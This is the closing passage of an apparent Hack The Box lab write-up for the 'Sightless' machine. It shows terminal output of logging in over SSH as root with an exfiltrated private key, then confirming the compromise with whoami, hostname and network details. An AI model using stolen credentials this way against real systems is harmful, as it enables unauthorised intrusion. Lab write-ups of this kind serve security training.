SSH


Testing the exfiltrated credential of the root account against the target SSH server

┌──(kali㉿kali)-[~/archive/htb/labs/sightless]
└─$ chmod 600 ./id_rsa.root 
 
┌──(kali㉿kali)-[~/archive/htb/labs/sightless]
└─$ ssh root@$IP -i ./id_rsa.root 
Last login: Tue Sep  3 08:18:45 2024
root@sightless:~# whoami
root
root@sightless:~# hostname
sightless
root@sightless:~# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:94:66:f5 brd ff:ff:ff:ff:ff:ff
    altname enp3s0
    altname ens160
    inet 10.129.242.165/16 brd 10.129.255.255 scope global dynamic eth0
       valid_lft 2866sec preferred_lft 2866sec
3: docker0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default 
    link/ether 02:42:67:f9:e1:ff brd ff:ff:ff:ff:ff:ff
    inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
       valid_lft forever preferred_lft forever
5: veth59e2fb7@if4: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master docker0 state UP group default 
    link/ether 62:bd:18:73:93:71 brd ff:ff:ff:ff:ff:ff link-netnsid 0

System Level Compromise